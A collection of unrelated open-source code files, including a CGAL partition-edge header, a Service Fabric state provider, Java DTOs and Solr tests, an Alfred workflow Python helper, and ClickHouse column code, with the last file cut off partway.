<gh_stars>1000+ // Copyright (c) 2000 Max-Planck-Institute Saarbruecken (Germany). // All rights reserved. // // This file is part of CGAL (www.cgal.org). // // $URL$ // $Id$ // SPDX-License-Identifier: GPL-3.0-or-later OR LicenseRef-Commercial // // // Author(s) : <NAME> <<EMAIL>> #ifndef CGAL_PARTITION_OPT_CVX_EDGE_H #define CGAL_PARTITION_OPT_CVX_EDGE_H #include <CGAL/license/Partition_2.h> #include <iostream> #include <CGAL/Partition_2/Partition_opt_cvx_diagonal_list.h> namespace CGAL { enum Partition_opt_cvx_edge_validity {PARTITION_OPT_CVX_NOT_VALID, PARTITION_OPT_CVX_START_VALID, PARTITION_OPT_CVX_END_VALID, PARTITION_OPT_CVX_BOTH_VALID}; class Partition_opt_cvx_edge { public: Partition_opt_cvx_edge(): _is_done(false), _validity(PARTITION_OPT_CVX_NOT_VALID), _is_visible(false), _value(0) {} bool is_done( ) const { return _is_done; } bool is_valid( ) const { return _validity != PARTITION_OPT_CVX_NOT_VALID; } Partition_opt_cvx_edge_validity validity( ) const { return _validity; } bool is_visible( ) const { return _is_visible; } int value( ) const { return _value; } Partition_opt_cvx_diagonal_list solution( ) const { return _solution; } void set_done(bool val) { _is_done = val; } void set_valid(Partition_opt_cvx_edge_validity val) { _validity = val; } template <class Point_2_, class Traits> void set_valid(const Point_2_& p1, const Point_2_& p2, const Point_2_& p3, const Point_2_& p4, const Point_2_& p5, const Point_2_& p6, const Traits& traits) { typedef typename Traits::Left_turn_2 Left_turn_2; Left_turn_2 left_turn = traits.left_turn_2_object(); _validity = PARTITION_OPT_CVX_NOT_VALID; Turn_reverser<typename Traits::Point_2, Left_turn_2> right_turn(left_turn); if (right_turn(p1, p2, p3)) _validity = PARTITION_OPT_CVX_START_VALID; if (right_turn(p4, p5, p6)) { if (_validity == PARTITION_OPT_CVX_START_VALID) _validity = PARTITION_OPT_CVX_BOTH_VALID; else _validity = PARTITION_OPT_CVX_END_VALID; } } void set_visible(bool vis) { _is_visible = vis; } void set_value(int val) { _value = val; } void set_solution(const Partition_opt_cvx_diagonal_list& diag_list) { _solution = diag_list; } private: bool _is_done; Partition_opt_cvx_edge_validity _validity; bool _is_visible; int _value; Partition_opt_cvx_diagonal_list _solution; }; inline std::ostream& operator<<(std::ostream& os, const Partition_opt_cvx_edge& g) { if (g.is_done()) os << "1"; else os << "0"; if (g.validity() == PARTITION_OPT_CVX_NOT_VALID) os << "0"; else if (g.validity() == PARTITION_OPT_CVX_START_VALID) os << "1"; else if (g.validity() == PARTITION_OPT_CVX_END_VALID) os << "2"; else os << "3"; if (g.is_visible()) os << "1"; else os << "0"; os << g.value(); return os; } } #endif // CGAL_PARTITION_OPT_CVX_EDGE_H
1,601
2,542
<filename>src/prod/src/data/txnreplicator/loggingreplicator/StateProvider.cpp // ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #include "stdafx.h" using namespace Common; using namespace ktl; using namespace Data::LoggingReplicator; using namespace Data::LogRecordLib; using namespace Data::Utilities; using namespace TxnReplicator; using namespace TestHooks; StateProvider::StateProvider(__in LoggingReplicatorImpl & loggingReplicatorStateProvider) : IStateProvider() , KObject() , KShared() , PartitionedReplicaTraceComponent(*loggingReplicatorStateProvider.PartitionedReplicaIdentifier) , loggingReplicatorStateProvider_(&loggingReplicatorStateProvider) , testHookContext_() { EventSource::Events->Ctor( TracePartitionId, ReplicaId, L"StateProvider", reinterpret_cast<uintptr_t>(this)); } StateProvider::~StateProvider() { EventSource::Events->Dtor( TracePartitionId, ReplicaId, L"StateProvider", reinterpret_cast<uintptr_t>(this)); } IStateProvider::SPtr StateProvider::Create( __in LoggingReplicatorImpl & loggingReplicator, __in KAllocator & allocator) { StateProvider * pointer = _new(V1REPLICATOR_TAG, allocator) StateProvider(loggingReplicator); if (pointer == nullptr) { throw Exception(STATUS_INSUFFICIENT_RESOURCES); } return IStateProvider::SPtr(pointer); } void StateProvider::Dispose() { loggingReplicatorStateProvider_.Reset(); } Awaitable<NTSTATUS> StateProvider::OnDataLossAsync(__out bool & result) { NTSTATUS status = co_await loggingReplicatorStateProvider_->OnDataLossAsync(result); co_return status; } Awaitable<NTSTATUS> StateProvider::UpdateEpochAsync( __in FABRIC_EPOCH const * epoch, __in LONG64 lastLsnInPreviousEpoch) { Epoch e(epoch->DataLossNumber, epoch->ConfigurationNumber); NTSTATUS status = co_await loggingReplicatorStateProvider_->UpdateEpochAsync(e, lastLsnInPreviousEpoch); co_return status; } HRESULT StateProvider::GetCopyContext(__out IOperationDataStream::SPtr & copyContextStream) { HRESULT ret = S_OK; NTSTATUS status = loggingReplicatorStateProvider_->GetCopyContext(copyContextStream); ret = StatusConverter::ToHResult(status); return ret; } HRESULT StateProvider::GetCopyState( __in FABRIC_SEQUENCE_NUMBER uptoSequenceNumber, __in OperationDataStream & copyContextStream, __out IOperationDataStream::SPtr & copyStateStream) { HRESULT ret = this->Test_GetInjectedFault(FaultInjector::FabricTest_GetCopyStateTag); if (!SUCCEEDED(ret)) { return ret; } NTSTATUS status = loggingReplicatorStateProvider_->GetCopyState( uptoSequenceNumber, copyContextStream, copyStateStream); ret = StatusConverter::ToHResult(status); return ret; } HRESULT StateProvider::GetLastCommittedSequenceNumber(FABRIC_SEQUENCE_NUMBER * lsn) { HRESULT ret = S_OK; NTSTATUS status = loggingReplicatorStateProvider_->GetLastCommittedSequenceNumber(*lsn); ret = StatusConverter::ToHResult(status); return ret; } void StateProvider::Test_SetTestHookContext(TestHooks::TestHookContext const & testHookContext) { testHookContext_ = testHookContext; if (loggingReplicatorStateProvider_) { loggingReplicatorStateProvider_->Test_SetTestHookContext(testHookContext); } } HRESULT StateProvider::CreateAsyncOnDataLossContext(__out AsyncOnDataLossContext::SPtr & asyncContext) { AsyncOnDataLossContextImpl::SPtr context = _new(V1REPLICATOR_TAG, GetThisAllocator()) AsyncOnDataLossContextImpl(); if (!context) { 
return StatusConverter::ToHResult(STATUS_INSUFFICIENT_RESOURCES); } NTSTATUS status = context->Status(); if (!NT_SUCCESS(status)) { return StatusConverter::ToHResult(status); } context->parent_ = this; asyncContext.Attach(context.DownCast<AsyncOnDataLossContext>()); context.Detach(); return S_OK; } HRESULT StateProvider::CreateAsyncUpdateEpochContext(__out AsyncUpdateEpochContext::SPtr & asyncContext) { ApiSignalHelper::WaitForSignalIfSet(testHookContext_, StateProviderBeginUpdateEpochBlock); auto hr = this->Test_GetInjectedFault(FaultInjector::FabricTest_BeginUpdateEpochTag); if (!SUCCEEDED(hr)) { return hr; } AsyncUpdateEpochContextImpl::SPtr context = _new(V1REPLICATOR_TAG, GetThisAllocator()) AsyncUpdateEpochContextImpl(); if (!context) { return StatusConverter::ToHResult(STATUS_INSUFFICIENT_RESOURCES); } NTSTATUS status = context->Status(); if (!NT_SUCCESS(status)) { return StatusConverter::ToHResult(status); } context->parent_ = this; asyncContext.Attach(context.DownCast<AsyncUpdateEpochContext>()); context.Detach(); return S_OK; } HRESULT StateProvider::Test_GetInjectedFault(wstring const & tag) { ErrorCodeValue::Enum injectedFault; if (FaultInjector::GetGlobalFaultInjector().TryReadError( tag, testHookContext_, injectedFault)) { return ErrorCode(injectedFault).ToHResult(); } return S_OK; } // // OnDataLoss Operation // StateProvider::AsyncOnDataLossContextImpl::AsyncOnDataLossContextImpl() : isStateChanged_(FALSE) { } StateProvider::AsyncOnDataLossContextImpl::~AsyncOnDataLossContextImpl() { } HRESULT StateProvider::AsyncOnDataLossContextImpl::StartOnDataLoss( __in_opt KAsyncContextBase * const parentAsyncContext, __in_opt KAsyncContextBase::CompletionCallback callback) { Start(parentAsyncContext, callback); return S_OK; } void StateProvider::AsyncOnDataLossContextImpl::OnStart() { DoWork(); } Task StateProvider::AsyncOnDataLossContextImpl::DoWork() { KCoShared$ApiEntry(); NTSTATUS status = STATUS_SUCCESS; bool result = false; status = co_await parent_->OnDataLossAsync(result); if (NT_SUCCESS(status)) { isStateChanged_ = result ? TRUE : FALSE; } Complete(status); } HRESULT StateProvider::AsyncOnDataLossContextImpl::GetResult( __out BOOLEAN & isStateChanged) { isStateChanged = isStateChanged_; return Result(); } // // UpdateEpoch Operation // StateProvider::AsyncUpdateEpochContextImpl::AsyncUpdateEpochContextImpl() : previousEpochLastSequenceNumber_(Constants::InvalidLsn) { epoch_.ConfigurationNumber = 0; epoch_.DataLossNumber = 0; epoch_.Reserved = nullptr; } StateProvider::AsyncUpdateEpochContextImpl::~AsyncUpdateEpochContextImpl() { } HRESULT StateProvider::AsyncUpdateEpochContextImpl::StartUpdateEpoch( __in FABRIC_EPOCH const & epoch, __in FABRIC_SEQUENCE_NUMBER previousEpochLastSequenceNumber, __in_opt KAsyncContextBase * const parentAsyncContext, __in_opt KAsyncContextBase::CompletionCallback callback) { epoch_ = epoch; previousEpochLastSequenceNumber_ = previousEpochLastSequenceNumber; Start(parentAsyncContext, callback); return S_OK; } void StateProvider::AsyncUpdateEpochContextImpl::OnStart() { DoWork(); } Task StateProvider::AsyncUpdateEpochContextImpl::DoWork() { KCoShared$ApiEntry(); NTSTATUS status = STATUS_SUCCESS; auto hr = parent_->Test_GetInjectedFault(FaultInjector::FabricTest_EndUpdateEpochTag); if (!SUCCEEDED(hr)) { status = ErrorCode::FromHResult(hr).ToNTStatus(); Complete(status); co_return; } try { co_await parent_->UpdateEpochAsync(&epoch_, previousEpochLastSequenceNumber_); } catch (Exception e) { status = e.GetStatus(); } Complete(status); }
2,901
9,782
<reponame>willianfonseca/presto /* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.facebook.presto.orc; import com.facebook.presto.orc.metadata.DwrfStripeCache; import java.util.Optional; public interface StripeMetadataSourceFactory { StripeMetadataSource create(Optional<DwrfStripeCache> dwrfStripeCache); /** * Creates a factory always returning the same instance of the StripeMetadataSource. */ static StripeMetadataSourceFactory of(StripeMetadataSource source) { return dwrfStripeCache -> source; } }
331
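The StripeMetadataSourceFactory.of helper above is just a constant-returning lambda; a short sketch of how a caller might rely on that (chooseSource and delegate are illustrative names, not part of the Presto API):

// The factory ignores the DWRF stripe cache and always hands back the same delegate.
static StripeMetadataSource chooseSource(StripeMetadataSource delegate) {
    StripeMetadataSourceFactory factory = StripeMetadataSourceFactory.of(delegate);
    return factory.create(Optional.empty());   // returns 'delegate' unchanged
}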
1,442
<reponame>VersiraSec/epsilon-cfw<gh_stars>1000+ #ifndef LIBA_IEEE754_H #define LIBA_IEEE754_H #include <stdint.h> uint32_t ieee754man32(float x); uint8_t ieee754exp32(float x); uint64_t ieee754man64(double x); uint16_t ieee754exp64(double x); #endif
119
5,133
<reponame>Saljack/mapstruct<gh_stars>1000+ /* * Copyright MapStruct Authors. * * Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0 */ package org.mapstruct.ap.test.bugs._1596.dto; import java.util.ArrayList; import java.util.List; /** * Immutable implementation of {@link ItemDTO}. * <p> * Use the builder to create immutable instances: * {@code ImmutableItemDTO.builder()}. */ @SuppressWarnings({ "all" }) public final class ImmutableItemDTO extends ItemDTO { private final String id; private ImmutableItemDTO(String id) { this.id = id; } /** * @return The value of the {@code id} attribute */ @Override public String getId() { return id; } /** * Copy the current immutable object by setting a value for the {@link ItemDTO#getId() id} attribute. * A shallow reference equality check is used to prevent copying of the same value by returning {@code this}. * * @param value A new value for id * * @return A modified copy of the {@code this} object */ public final ImmutableItemDTO withId(String value) { if ( this.id == value ) { return this; } return new ImmutableItemDTO( value ); } /** * This instance is equal to all instances of {@code ImmutableItemDTO} that have equal attribute values. * * @return {@code true} if {@code this} is equal to {@code another} instance */ @Override public boolean equals(Object another) { if ( this == another ) { return true; } return another instanceof ImmutableItemDTO && equalTo( (ImmutableItemDTO) another ); } private boolean equalTo(ImmutableItemDTO another) { return id.equals( another.id ); } /** * Computes a hash code from attributes: {@code id}. * * @return hashCode value */ @Override public int hashCode() { int h = 5381; h += ( h << 5 ) + id.hashCode(); return h; } /** * Prints the immutable value {@code ItemDTO} with attribute values. * * @return A string representation of the value */ @Override public String toString() { return "ItemDTO{" + "id=" + id + "}"; } /** * Creates an immutable copy of a {@link ItemDTO} value. * Uses accessors to get values to initialize the new immutable instance. * If an instance is already immutable, it is returned as is. * * @param instance The instance to copy * * @return A copied immutable ItemDTO instance */ public static ImmutableItemDTO copyOf(ItemDTO instance) { if ( instance instanceof ImmutableItemDTO ) { return (ImmutableItemDTO) instance; } return ImmutableItemDTO.builder() .from( instance ) .build(); } /** * Creates a builder for {@link ImmutableItemDTO ImmutableItemDTO}. * * @return A new ImmutableItemDTO builder */ public static ImmutableItemDTO.Builder builder() { return new ImmutableItemDTO.Builder(); } /** * Builds instances of type {@link ImmutableItemDTO ImmutableItemDTO}. * Initialize attributes and then invoke the {@link #build()} method to create an * immutable instance. * <p><em>{@code Builder} is not thread-safe and generally should not be stored in a field or collection, * but instead used immediately to create instances.</em> */ public static final class Builder { private static final long INIT_BIT_ID = 0x1L; private long initBits = 0x1L; private String id; private Builder() { } /** * Fill a builder with attribute values from the provided {@code ItemDTO} instance. * Regular attribute values will be replaced with those from the given instance. * Absent optional values will not replace present values. 
* * @param instance The instance from which to copy values * * @return {@code this} builder for use in a chained invocation */ public final Builder from(ItemDTO instance) { id( instance.getId() ); return this; } /** * Initializes the value for the {@link ItemDTO#getId() id} attribute. * * @param id The value for id * * @return {@code this} builder for use in a chained invocation */ public final Builder id(String id) { this.id = id; initBits &= ~INIT_BIT_ID; return this; } /** * Builds a new {@link ImmutableItemDTO ImmutableItemDTO}. * * @return An immutable instance of ItemDTO * * @throws java.lang.IllegalStateException if any required attributes are missing */ public ImmutableItemDTO build() { if ( initBits != 0 ) { throw new IllegalStateException( formatRequiredAttributesMessage() ); } return new ImmutableItemDTO( id ); } private String formatRequiredAttributesMessage() { List<String> attributes = new ArrayList<String>(); if ( ( initBits & INIT_BIT_ID ) != 0 ) { attributes.add( "id" ); } return "Cannot build ItemDTO, some of required attributes are not set " + attributes; } } }
2,253
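A small round-trip through the generated builder above, using only the API shown in the file; the id value is arbitrary:

ImmutableItemDTO dto = ImmutableItemDTO.builder()
        .id("item-42")
        .build();                                   // omitting id() would make build() throw IllegalStateException
ImmutableItemDTO copy = ImmutableItemDTO.copyOf(dto);   // already immutable, so the same instance is returned
ImmutableItemDTO same = dto.withId(dto.getId());        // reference-equal value, so 'dto' itself comes back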
5,169
<reponame>Gantios/Specs { "name": "nativebridge-ios", "version": "0.1.1", "summary": "The native part of a communication bridge between javascript running in a WKWebView and your app.", "description": "When used together with its javascript counterpart, 'nativebridge', this framework enables communication between\nyour app and the javascript hosted in a WKWebView.", "homepage": "https://github.com/nrkno/nativebridge-ios", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "<NAME>": "<EMAIL>" }, "source": { "git": "https://github.com/nrkno/nativebridge-ios.git", "tag": "0.1.1" }, "module_name": "NativeBridge", "platforms": { "ios": "9.0" }, "source_files": "nativebridge-ios/Classes/**/*", "ios": { "frameworks": "WebKit" } }
297
2,177
<reponame>yagosys/AlfredWorkflow.com #!/usr/bin/python # coding=UTF-8 import plistlib import os.path preferences = plistlib.readPlist('info.plist') bundleid = preferences['bundleid'] cache_dir = os.path.expanduser('~/Library/Caches' '/com.runningwithcrayons.Alfred-2' '/Workflow Data/{}'.format(bundleid)) data_dir = os.path.expanduser('~/Library/Application Support/Alfred 2' '/Workflow Data/{}'.format(bundleid)) class Item(object): '''An item in an Alfred feedback XML message''' def __init__(self, uid, title, subtitle=None, icon=None, valid=False, arg=None): self.uid = uid self.title = title self.subtitle = subtitle self.valid = valid self.arg = arg self.icon = icon if icon is not None else 'icon.png' def to_xml(self): attrs = [] attrs.append('uid="{}-{}"'.format(bundleid, self.uid)) if self.valid: attrs.append('valid="yes"') else: attrs.append('valid="no"') if self.arg is not None: attrs.append(u'arg="{}"'.format(self.arg)) xml = [u'<item {}>'.format(u' '.join(attrs))] xml.append(u'<title>{}</title>'.format(self.title)) if self.subtitle is not None: xml.append(u'<subtitle>{}</subtitle>'.format(self.subtitle)) if self.icon is not None: xml.append(u'<icon>{}</icon>'.format(self.icon)) xml.append(u'</item>') return ''.join(xml) def to_xml(items): '''Convert a list of Items to an Alfred XML feedback message''' msg = [u'<?xml version="1.0"?>', u'<items>'] for item in items: msg.append(item.to_xml()) msg.append(u'</items>') return u''.join(msg) def get_from_user(title, prompt, hidden=False, value=None): ''' Popup a dialog to request some piece of information. The main use for this function is to request information that you don't want showing up in Alfred's command history. ''' if value is None: value = '' script = ''' on run argv tell application "Alfred 2" activate set alfredPath to (path to application "Alfred 2") set alfredIcon to path to resource "appicon.icns" in bundle ¬ (alfredPath as alias) set dlgTitle to (item 1 of argv) set dlgPrompt to (item 2 of argv) if (count of argv) is 3 set dlgHidden to (item 3 of argv as boolean) else set dlgHidden to false end if if dlgHidden display dialog dlgPrompt & ":" with title dlgTitle ¬ default answer "{v}" with icon alfredIcon with hidden answer else display dialog dlgPrompt & ":" with title dlgTitle ¬ default answer "{v}" with icon alfredIcon end if set answer to text returned of result end tell end run'''.format(v=value) from subprocess import Popen, PIPE cmd = ['osascript', '-', title, prompt] if hidden: cmd.append('true') p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, stderr = p.communicate(script) return stdout.rstrip('\n') def show_message(title, message): '''Display a message dialog''' script = ''' on run argv tell application "Alfred 2" activate set alfredPath to (path to application "Alfred 2") set alfredIcon to path to resource "appicon.icns" in bundle ¬ (alfredPath as alias) set dlgTitle to (item 1 of argv) set dlgMessage to (item 2 of argv) display dialog dlgMessage with title dlgTitle buttons ¬ {"OK"} default button "OK" with icon alfredIcon end tell end run''' from subprocess import Popen, PIPE cmd = ['osascript', '-', title, message] p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE) p.communicate(script) if __name__ == '__main__': from sys import argv globals()[argv[1]](*argv[2:])
2,040
1,056
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.php.editor; import java.util.ArrayList; import java.util.Collection; import java.util.List; import org.netbeans.modules.csl.api.ElementHandle; import org.netbeans.modules.php.editor.api.QualifiedName; import org.netbeans.modules.php.editor.api.QualifiedNameKind; import org.netbeans.modules.php.editor.api.elements.FullyQualifiedElement; import org.netbeans.modules.php.editor.api.elements.TypeMemberElement; import org.netbeans.modules.php.editor.model.ModelElement; import org.netbeans.modules.php.editor.model.Scope; import org.netbeans.modules.php.editor.model.TypeScope; import org.netbeans.modules.php.editor.model.nodes.NamespaceDeclarationInfo; public class NamespaceIndexFilter<T extends ElementHandle> { private final String requestPrefix; private final QualifiedName prefix; private QualifiedNameKind kind; private String namespaceName; private String name; private int segmentSize; public NamespaceIndexFilter(String requestPrefix) { super(); this.requestPrefix = requestPrefix; this.prefix = QualifiedName.create(requestPrefix); } public NamespaceIndexFilter(QualifiedName qname) { super(); this.requestPrefix = qname.toString(); this.prefix = qname; } /** * @return the prefixStr */ public String getRequestPrefix() { return requestPrefix; } /** * @return the namespaceName */ public String getNamespaceName() { if (namespaceName == null) { namespaceName = prefix.toNamespaceName(true).toString(); } return namespaceName; } /** * @return the name */ public String getName() { if (name == null) { name = prefix.toString(); } return name; } public QualifiedNameKind getKind() { if (kind == null) { kind = prefix.getKind(); } return kind; } public int getSegmentSize() { if (segmentSize != -1) { segmentSize = prefix.getSegments().size(); } return segmentSize; } public Collection<T> filter(final Collection<T> originalElems) { return filter(originalElems, getName().trim().length() == 0); } public Collection<? extends ModelElement> filterModelElements(final Collection<? 
extends ModelElement> originalElems, boolean strictCCOption) { if (getKind().isUnqualified()) { return originalElems; } List<ModelElement> retval = new ArrayList<>(); String namespaneNameLCase = getNamespaceName().toLowerCase(); String namespaneNameLCaseSlashed = namespaneNameLCase; if (!namespaneNameLCaseSlashed.endsWith("\\")) { //NOI18N namespaneNameLCaseSlashed += "\\"; } for (ModelElement elem : originalElems) { final Scope inScope = elem.getInScope(); ModelElement originalElem = null; if (inScope instanceof TypeScope) { originalElem = elem; elem = inScope; } String fqn = elem.getNamespaceName().append(elem.getName()).toFullyQualified().toString(); final int indexOf = fqn.toLowerCase().indexOf(namespaneNameLCaseSlashed); final boolean fullyQualified = getKind().isFullyQualified(); if (fullyQualified ? indexOf == 0 : indexOf != -1) { if (strictCCOption && (fullyQualified || getSegmentSize() > 1)) { final QualifiedName nsFqn = QualifiedName.create(fqn).toNamespaceName(true); if (nsFqn.toString().toLowerCase().indexOf(namespaneNameLCase) == -1) { continue; } final String elemName = fqn.substring(indexOf + namespaneNameLCaseSlashed.length()); if (elemName.indexOf(NamespaceDeclarationInfo.NAMESPACE_SEPARATOR) != -1) { continue; } } retval.add(originalElem != null ? originalElem : elem); } } return retval; } public Collection<T> filter(final Collection<T> originalElems, boolean strictCCOption) { if (getKind().isUnqualified()) { return originalElems; } Collection<T> retval = new ArrayList<>(); String namespaneNameLCase = getNamespaceName().toLowerCase(); String namespaneNameLCaseSlashed = namespaneNameLCase; if (!namespaneNameLCaseSlashed.endsWith("\\")) { //NOI18N namespaneNameLCaseSlashed += "\\"; } for (T elem : originalElems) { if (elem instanceof FullyQualifiedElement || elem instanceof TypeMemberElement) { if (elem instanceof TypeMemberElement) { int idx = ((TypeMemberElement) elem).getType().getName().toLowerCase().indexOf(getName().toLowerCase()); if (idx == -1) { retval.add(elem); continue; } } String fqn = elem instanceof FullyQualifiedElement ? ((FullyQualifiedElement) elem).getFullyQualifiedName().toString() : ((TypeMemberElement) elem).getType().getFullyQualifiedName().toString(); final int indexOf = fqn.toLowerCase().indexOf(namespaneNameLCaseSlashed); final boolean fullyQualified = getKind().isFullyQualified(); if (fullyQualified ? indexOf == 0 : indexOf != -1) { if (strictCCOption && (fullyQualified || getSegmentSize() > 1)) { final QualifiedName nsFqn = QualifiedName.create(fqn).toNamespaceName(true); if (nsFqn.toString().toLowerCase().indexOf(namespaneNameLCase) == -1) { continue; } final String elemName = fqn.substring(indexOf + namespaneNameLCaseSlashed.length()); if (elemName.indexOf(NamespaceDeclarationInfo.NAMESPACE_SEPARATOR) != -1) { continue; } } retval.add(elem); } } else if (namespaneNameLCase.equals(NamespaceDeclarationInfo.DEFAULT_NAMESPACE_NAME)) { retval.add(elem); } } return retval; } }
3,197
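A sketch of how the prefix accessors above behave for a fully qualified PHP name; the exact string normalization is delegated to QualifiedName, so the comments describe intent rather than exact output:

NamespaceIndexFilter<ElementHandle> filter = new NamespaceIndexFilter<>("\\Foo\\Bar\\Baz");
QualifiedNameKind kind = filter.getKind();          // fully qualified, since the prefix starts with a separator
String namespacePart  = filter.getNamespaceName();  // namespace portion used to match index entries
String namePart       = filter.getName();           // the prefix itself, used for the empty-name shortcut in filter()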
585
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.response; import java.io.StringWriter; import java.util.Map; import java.util.HashMap; import java.util.List; import java.util.ArrayList; import java.util.Iterator; import org.apache.solr.SolrTestCaseJ4; import org.apache.solr.client.solrj.io.comp.StreamComparator; import org.apache.solr.client.solrj.io.graph.Traversal; import org.apache.solr.client.solrj.io.stream.TupleStream; import org.apache.solr.client.solrj.io.stream.StreamContext; import org.apache.solr.client.solrj.io.stream.expr.StreamFactory; import org.apache.solr.client.solrj.io.Tuple; import org.apache.solr.client.solrj.io.stream.expr.Explanation; import org.apache.solr.request.SolrQueryRequest; import org.apache.solr.util.BaseTestHarness; import org.junit.BeforeClass; import org.junit.Test; public class TestGraphMLResponseWriter extends SolrTestCaseJ4 { @BeforeClass public static void beforeClass() throws Exception { System.setProperty("enable.update.log", "false"); // schema12 doesn't support _version_ initCore("solrconfig.xml","schema12.xml"); } @Test @SuppressWarnings({"unchecked"}) public void testGraphMLOutput() throws Exception { SolrQueryRequest request = req("blah", "blah"); // Just need a request to attach the stream and traversal to. 
SolrQueryResponse response = new SolrQueryResponse(); @SuppressWarnings({"rawtypes"}) Map context = request.getContext(); TupleStream stream = new TestStream(); //Simulates a GatherNodesStream Traversal traversal = new Traversal(); context.put("traversal", traversal); context.put("stream", stream); StringWriter writer = new StringWriter(); GraphMLResponseWriter graphMLResponseWriter = new GraphMLResponseWriter(); graphMLResponseWriter.write(writer, request, response); String graphML = writer.toString(); //Validate the nodes String error = BaseTestHarness.validateXPath(graphML, "//graph/node[1][@id ='bill']", "//graph/node[2][@id ='jim']", "//graph/node[3][@id ='max']"); if(error != null) { throw new Exception(error); } //Validate the edges error = BaseTestHarness.validateXPath(graphML, "//graph/edge[1][@source ='jim']", "//graph/edge[1][@target ='bill']", "//graph/edge[2][@source ='max']", "//graph/edge[2][@target ='bill']", "//graph/edge[3][@source ='max']", "//graph/edge[3][@target ='jim']", "//graph/edge[4][@source ='jim']", "//graph/edge[4][@target ='max']" ); if(error != null) { throw new Exception(error); } } @SuppressWarnings({"unchecked"}) private static class TestStream extends TupleStream { private Iterator<Tuple> tuples; public TestStream() { //Create some nodes List<Tuple> testTuples = new ArrayList<>(); @SuppressWarnings({"rawtypes"}) Map m1 = new HashMap(); List<String> an1 = new ArrayList<>(); an1.add("jim"); an1.add("max"); m1.put("node", "bill"); m1.put("ancestors", an1); testTuples.add(new Tuple(m1)); @SuppressWarnings({"rawtypes"}) Map m2 = new HashMap(); List<String> an2 = new ArrayList<>(); an2.add("max"); m2.put("node", "jim"); m2.put("ancestors", an2); testTuples.add(new Tuple(m2)); @SuppressWarnings({"rawtypes"}) Map m3 = new HashMap(); List<String> an3 = new ArrayList<>(); an3.add("jim"); m3.put("node", "max"); m3.put("ancestors", an3); testTuples.add(new Tuple(m3)); tuples = testTuples.iterator(); } public StreamComparator getStreamSort() { return null; } public void close() { } public void open() { } public List<TupleStream> children() { return null; } @SuppressWarnings({"unchecked"}) public Tuple read() { if(tuples.hasNext()) { return tuples.next(); } else { @SuppressWarnings({"rawtypes"}) Map map = new HashMap(); map.put("EOF", true); return new Tuple(map); } } public void setStreamContext(StreamContext streamContext) { } public Explanation toExplanation(StreamFactory factory) { return null; } } }
2,173
15,577
#include <IO/WriteBufferFromString.h> #include <IO/Operators.h> #include <Columns/IColumn.h> #include <Columns/ColumnNullable.h> #include <Columns/ColumnConst.h> #include <Core/Field.h> namespace DB { String IColumn::dumpStructure() const { WriteBufferFromOwnString res; res << getFamilyName() << "(size = " << size(); ColumnCallback callback = [&](ColumnPtr & subcolumn) { res << ", " << subcolumn->dumpStructure(); }; const_cast<IColumn*>(this)->forEachSubcolumn(callback); res << ")"; return res.str(); } void IColumn::insertFrom(const IColumn & src, size_t n) { insert(src[n]); } bool isColumnNullable(const IColumn & column) { return checkColumn<ColumnNullable>(column); } bool isColumnConst(const IColumn & column) { return checkColumn<ColumnConst>(column); } }
309
2,542
<gh_stars>1000+ // ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once #define RATE_INDEX 0 #define AVG_BASE_INDEX 50 #define DURATION_INDEX 100 #define RATE_COUNTER( Id, Name, Description ) \ COUNTER_DEFINITION( RATE_INDEX+Id, Common::PerformanceCounterType::RateOfCountPerSecond32, Name, Description ) #define AVG_BASE( Id, Name ) \ COUNTER_DEFINITION( AVG_BASE_INDEX+Id, Common::PerformanceCounterType::AverageBase, Name, L"", noDisplay) #define DURATION_COUNTER( Id, Name, Description ) \ COUNTER_DEFINITION_WITH_BASE( DURATION_INDEX+Id, AVG_BASE_INDEX+Id, Common::PerformanceCounterType::AverageCount64, Name, Description ) #define DEFINE_RATE_COUNTER( Id, Name) \ DEFINE_COUNTER_INSTANCE( Name, RATE_INDEX+Id ) #define DEFINE_AVG_BASE_COUNTER( Id, Name) \ DEFINE_COUNTER_INSTANCE( Name, AVG_BASE_INDEX+Id ) #define DEFINE_DURATION_COUNTER( Id, Name) \ DEFINE_COUNTER_INSTANCE( Name, DURATION_INDEX+Id ) namespace Naming { class NamingPerformanceCounters { DENY_COPY(NamingPerformanceCounters) public: BEGIN_COUNTER_SET_DEFINITION( L"7CF963F9-5E87-42F0-BAEE-B98C86206BA6", L"Naming Service", L"Counters for Naming Service", Common::PerformanceCounterSetInstanceType::Multiple) RATE_COUNTER( 1, L"AO Create Name req/sec", L"Incoming (authority owner) create name requests per second") RATE_COUNTER( 2, L"AO Delete Name req/sec", L"Incoming (authority owner) delete name requests per second") RATE_COUNTER( 3, L"NO Create Name req/sec", L"Incoming (name owner) create name requests per second") RATE_COUNTER( 4, L"NO Delete Name 